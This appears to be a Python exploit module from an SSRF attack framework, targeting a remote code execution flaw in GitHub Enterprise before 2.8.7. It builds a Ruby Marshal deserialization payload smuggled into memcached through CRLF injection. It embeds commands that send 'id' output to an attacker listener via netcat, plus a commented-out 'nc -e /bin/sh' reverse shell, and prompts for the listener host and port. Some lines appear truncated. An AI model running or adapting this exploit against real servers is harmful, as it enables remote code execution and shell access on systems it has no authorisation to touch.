from core.utils import * import urllib.parse import logging name = "github" description = "Github Enterprise RCE < 2.8.7" author = "Orange" documentation = [ "", "" ] class exploit(): def __init__(self, requester, args):"Module '{name}' launched !") # Data for the service ip = "0" port = "8000" data = "composer/send_email?" cmd = "id | nc SERVER_HOST SERVER_PORT" # cmd = "nc SERVER_HOST SERVER_PORT -e /bin/sh" marshal_code = f'\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`{cmd}`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult' payload = [ '', 'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code), marshal_code, '', '' ] payload = map(urllib.parse.quote, payload) payload = wrapper_http(data+'%0D%0A'.join(payload), ip, port) # Handle args for reverse shell if args.lhost == None: payload = payload.replace("SERVER_HOST", input("Server Host:")) else: payload = payload.replace("SERVER_HOST", args.lhost) if args.lport == None: payload = payload.replace("SERVER_PORT", input("Server Port:")) else: payload = payload.replace("SERVER_PORT", args.lport)"You need to insert the WebHooks in 'https://ghe-server/:user/:repo/settings/hooks'")"Then make a request to 'https://ghe-server/search?q=ggggg&type=Repositories'")"Payload : {payload}")